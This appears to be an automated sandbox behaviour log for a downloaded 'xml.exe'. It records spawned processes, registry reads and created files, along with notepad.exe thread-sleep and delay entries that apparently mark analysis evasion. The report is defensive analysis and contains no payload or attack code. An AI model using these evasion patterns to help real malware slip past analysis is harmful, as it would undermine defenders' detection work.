Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-GB --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8184 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Users\user\Downloads\xml.exe "C:\Users\user\Downloads\xml.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6776 --field-trial-handle=1952,i,13579703715836631076,8687465127834077069,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE	Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\user\Downloads\xml.xml
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:8004 CREDAT:9474 /prefetch:2
Source: C:\Users\user\Downloads\xml.exe	Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\Downloads\857bae32-9da1-41f6-909a-b81fa10c92f3.tmp

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\notepad.exe TID: 3608	Thread sleep count: 40 > 30
Source: C:\Windows\System32\notepad.exe TID: 3608	Thread sleep time: -2400000s >= -30000s
Source: C:\Windows\System32\notepad.exe TID: 3608	Thread sleep count: 107 > 30
Source: C:\Windows\System32\notepad.exe TID: 3608	Thread sleep time: -6420000s >= -30000s
Source: C:\Windows\System32\notepad.exe TID: 3608	Thread sleep count: 119 > 30
Source: C:\Windows\System32\notepad.exe TID: 3608	Thread sleep time: -7140000s >= -30000s

Source: C:\Windows\System32\notepad.exe	Thread delayed: delay time: 60000
Source: C:\Windows\System32\notepad.exe	Thread delayed: delay time: 60000
Source: C:\Windows\System32\notepad.exe	Thread delayed: delay time: 60000